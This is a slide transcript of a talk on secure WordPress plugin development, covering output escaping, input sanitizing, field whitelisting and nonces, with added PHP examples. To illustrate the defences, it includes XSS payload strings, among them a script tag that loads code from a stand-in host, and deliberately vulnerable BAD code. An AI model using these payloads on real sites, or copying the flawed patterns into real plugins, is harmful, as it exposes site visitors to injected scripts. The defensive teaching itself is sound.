So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?

Secure WordPress Development Practices

Sep 01, 2014


Brandon Dove

I gave this talk at the September OCWP developer meetup.
Transcript
Page 1: Secure WordPress Development Practices

So you’re writing code for the masses, huh? Are you being responsible and protecting them from getting pwned?

Page 3: Secure WordPress Development Practices

That guy pwned a plugin I wrote live on stage at WordCamp New York. It changed my life.

Page 5: Secure WordPress Development Practices

tl;dr

• Keep your dev environment clean

• Escape your data output

• Sanitize your data inputs

• Validate referrers

• Core functionality should always trump your super awesome functionality

Page 6: Secure WordPress Development Practices

Keep Your Dev Environment Clean

Don’t think that just because you’re on a Mac you’re safe from viruses.

If you’re on a PC, you should assume you’re already pwned.

Page 7: Secure WordPress Development Practices

Kaspersky Anti-Virus

• I use it.

• Dre uses it.

• Tony uses it.

• You should be using it.

Page 8: Secure WordPress Development Practices

Trust No One, Trust Nothing

Page 9: Secure WordPress Development Practices

XSS: Cross-site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007.[1] Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.

http://en.wikipedia.org/wiki/Cross-site_scripting

Page 10: Secure WordPress Development Practices

Escape All The Things On Output (http://codex.wordpress.org/Data_Validation#Output_Sanitation)

• Bad data will be tamed

• esc_{context}

• esc_js - Escape single quotes, htmlspecialchar " < > &, and fix line endings.

• esc_html - Escaping for HTML blocks.

• esc_attr - Escaping for HTML attributes.

• esc_sql - Escapes data for use in a MySQL query.

• esc_url - Checks and cleans a URL.

• esc_textarea - Escaping for textarea values.
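The same stored value lands in several different output contexts, and each context needs its own escaper. The following is an added example, not code from the slides; the myplugin_ function names and the profile field names are assumptions made for illustration.

```php
<?php
/*
 * Added example (not from the slides): one stored profile rendered into five
 * output contexts, each escaped with the esc_{context} function that matches
 * the context. The myplugin_ function names and field names are assumptions.
 */

/** BAD: raw concatenation; a stored <script> tag runs in every visitor's browser. */
function myplugin_render_name_unescaped( $name ) {
    return '<h2>' . $name . '</h2>';
}

/** GOOD: pick the escaper by where the value lands, not by where it came from. */
function myplugin_render_profile( array $profile ) {
    $name = isset( $profile['name'] ) ? $profile['name'] : '';
    $site = isset( $profile['site'] ) ? $profile['site'] : '';
    $bio  = isset( $profile['bio'] )  ? $profile['bio']  : '';
    ob_start();
    ?>
    <!-- HTML text node: esc_html entity-encodes < > & " ' -->
    <h2><?php echo esc_html( $name ); ?></h2>

    <!-- Attribute value: esc_attr, and always wrap the attribute in quotes -->
    <div class="profile" data-name="<?php echo esc_attr( $name ); ?>">

        <!-- href: esc_url drops schemes outside wp_allowed_protocols(), so a
             javascript: value comes back as an empty string -->
        <a href="<?php echo esc_url( $site ); ?>">Website</a>

        <!-- textarea body: esc_textarea keeps a stray </textarea> from closing the element -->
        <textarea name="bio"><?php echo esc_textarea( $bio ); ?></textarea>

        <!-- Single-quoted inline JS string: esc_js (escapes quotes, < > &, line endings) -->
        <script>var profileName = '<?php echo esc_js( $name ); ?>';</script>
    </div>
    <?php
    return ob_get_clean();
}

// Constructed hostile values, the kind a careless save handler leaves in post meta.
$hostile = array(
    'name' => '<script>alert(1)</script>',
    'site' => 'javascript:alert(1)',
    'bio'  => '</textarea><script>alert(1)</script>',
);
echo myplugin_render_profile( $hostile );
```

Run inside a loaded WordPress install (for example from a plugin file), since the esc_* functions live in wp-includes/formatting.php. The point to notice is that the choice of escaper is made at the echo, once per context, and never at save time.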

Page 11: Secure WordPress Development Practices

Sanitize All The Things On Input (http://codex.wordpress.org/Data_Validation#Input_Validation)

• sanitize_* and similar functions help for most things

• $_POST = array( 'e' => '<script src="http://pwnd.com/u.js"></script>' );

• BAD: update_post_meta( $id, 'e', $_POST['e'] );

• GOOD: update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) );

• Note: sanitizing might silently change the data and give unexpected results, so validate first where you can

Page 12: Secure WordPress Development Practices

Whitelisting Data (http://codex.wordpress.org/Data_Validation#Whitelist)

• Whitelisting data - Only accept known data

• $_POST = array( 'pwn' => '<script src="http://pwnd.com/u.js"></script>', 'e' => '[email protected]' );

• BAD:

• foreach ( $_POST as $key => $val ) : update_post_meta( $id, $key, $val ); endforeach;

• GOOD: update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) );

Page 13: Secure WordPress Development Practices

Blacklisting Data (http://codex.wordpress.org/Data_Validation#Blacklist)

• Blacklisting data - Only accept data if it’s in the proper format

• $_POST = array( 'e' => 'me@domain.' );

• if ( is_email( $_POST['e'] ) ) update_post_meta( $id, 'e', sanitize_email( $_POST['e'] ) );
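Pages 11 through 13 are three steps of one save handler: only accept the keys you expect, validate each value's format, and only then sanitize and store it. This is an added example that pulls those steps together; it is not code from the slides, and the meta keys, field names and myplugin_ helpers are assumptions for illustration.

```php
<?php
/*
 * Added example (not from the slides): a save handler that whitelists the
 * fields it accepts, validates each one, then sanitizes before storing.
 * The field names, meta keys and myplugin_ helpers are assumptions.
 */

/**
 * BAD (the foreach from the slide): stores every key the request carries, so
 * a request can write arbitrary meta keys, including ones a theme later echoes.
 */
function myplugin_save_profile_bad( $post_id ) {
    foreach ( $_POST as $key => $val ) {
        update_post_meta( $post_id, $key, $val );
    }
}

/**
 * GOOD: whitelist the field names, validate the format, sanitize the value.
 * Returns the fields that were actually stored, which makes the behaviour
 * easy to check from a test.
 */
function myplugin_save_profile( $post_id, array $input ) {
    // Whitelist: accepted field => array( validator callback, sanitizer callback ).
    // Anything not listed here ('pwn', for instance) is never looked at.
    $fields = array(
        'e'    => array( 'is_email',           'sanitize_email' ),
        'site' => array( 'myplugin_is_http',   'esc_url_raw' ),
        'name' => array( 'myplugin_not_blank', 'sanitize_text_field' ),
    );
    $saved = array();
    foreach ( $fields as $key => $callbacks ) {
        if ( ! isset( $input[ $key ] ) ) {
            continue;
        }
        // WordPress adds magic-quote style slashes to request data; remove them once.
        $raw = wp_unslash( $input[ $key ] );

        // Validate first: is_email() rejects 'me@domain.' outright instead of
        // letting sanitize_email() quietly turn it into something else.
        if ( ! call_user_func( $callbacks[0], $raw ) ) {
            continue;
        }
        $clean = call_user_func( $callbacks[1], $raw );
        update_post_meta( $post_id, $key, $clean );
        $saved[ $key ] = $clean;
    }
    return $saved;
}

/** Validator: only http(s) URLs are acceptable for the website field. */
function myplugin_is_http( $url ) {
    $scheme = parse_url( $url, PHP_URL_SCHEME );
    return in_array( $scheme, array( 'http', 'https' ), true );
}

/** Validator: a display name must not be empty or whitespace only. */
function myplugin_not_blank( $value ) {
    return '' !== trim( (string) $value );
}

// Constructed request, mirroring the slide: a hostile extra key plus one bad email.
$request = array(
    'pwn'  => '<script src="http://pwnd.com/u.js"></script>',
    'e'    => 'me@domain.',
    'site' => 'javascript:alert(1)',
    'name' => '  Brandon  ',
);
$stored = myplugin_save_profile( 123, $request );
```

With that request only 'name' survives: 'pwn' is not in the whitelist, 'me@domain.' fails is_email(), and the javascript: URL fails myplugin_is_http(). Hooking the handler into save_post (with the nonce check from the next slides in front of it) is the usual way to wire it up.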

Page 15: Secure WordPress Development Practices

Sweet, this might lead to my next big deal! ACCEPT!

Page 17: Secure WordPress Development Practices

Nonces FTW! (http://codex.wordpress.org/WordPress_Nonces)

• Before the Request

• wp_nonce_url

• wp_create_nonce

• wp_nonce_field

• Verify the Request

• wp_verify_nonce

• check_admin_referer
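The two halves of the list above belong together: the nonce is emitted with the form or link before the request, and checked when the request arrives. This is an added example, not code from the slides; the action name myplugin_delete_item, the nonce field name and the myplugin_ function names are assumptions.

```php
<?php
/*
 * Added example (not from the slides): issuing a nonce before the request and
 * verifying it on arrival. The action name, nonce field name and myplugin_
 * function names are assumptions for illustration.
 */

// 1. Before the request: a form carrying the nonce as a hidden field.
//    Tying the item id into the action string scopes the nonce to that item.
function myplugin_render_delete_form( $item_id ) {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="myplugin_delete_item">
        <input type="hidden" name="item_id" value="<?php echo esc_attr( $item_id ); ?>">
        <?php wp_nonce_field( 'myplugin_delete_item_' . $item_id, 'myplugin_nonce' ); ?>
        <button type="submit">Delete</button>
    </form>
    <?php
}

//    The same thing for a plain link: wp_nonce_url appends the nonce as a query arg.
function myplugin_delete_link( $item_id ) {
    $url = add_query_arg(
        array( 'action' => 'myplugin_delete_item', 'item_id' => $item_id ),
        admin_url( 'admin-post.php' )
    );
    return wp_nonce_url( $url, 'myplugin_delete_item_' . $item_id, 'myplugin_nonce' );
}

// 2. Verify the request. check_admin_referer() calls wp_die() when the nonce is
//    missing, expired, or was issued for a different user, action or item.
function myplugin_handle_delete() {
    $item_id = isset( $_REQUEST['item_id'] ) ? absint( $_REQUEST['item_id'] ) : 0;

    check_admin_referer( 'myplugin_delete_item_' . $item_id, 'myplugin_nonce' );

    // A nonce proves intent, not permission: the capability check is still needed.
    if ( ! current_user_can( 'delete_post', $item_id ) ) {
        wp_die( 'You are not allowed to delete this item.', 403 );
    }

    wp_delete_post( $item_id );
    wp_safe_redirect( wp_get_referer() ? wp_get_referer() : admin_url() );
    exit;
}
add_action( 'admin_post_myplugin_delete_item', 'myplugin_handle_delete' );

//    Non-fatal variant for AJAX or REST-style handlers: wp_verify_nonce() returns
//    1 or 2 (nonce from the current or previous 12-hour tick) or false.
function myplugin_nonce_is_valid( $nonce, $item_id ) {
    return false !== wp_verify_nonce( $nonce, 'myplugin_delete_item_' . $item_id );
}
```

Note that nonces in WordPress are not single-use: the same value stays valid for up to 24 hours, so they defend against cross-site request forgery, not replay, and the capability check next to them is what actually enforces who may perform the action.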

Page 18: Secure WordPress Development Practices

Is there an API for that?

Page 19: Secure WordPress Development Practices

Professional WordPress Plugin Development (http://amzn.to/plugindevbook)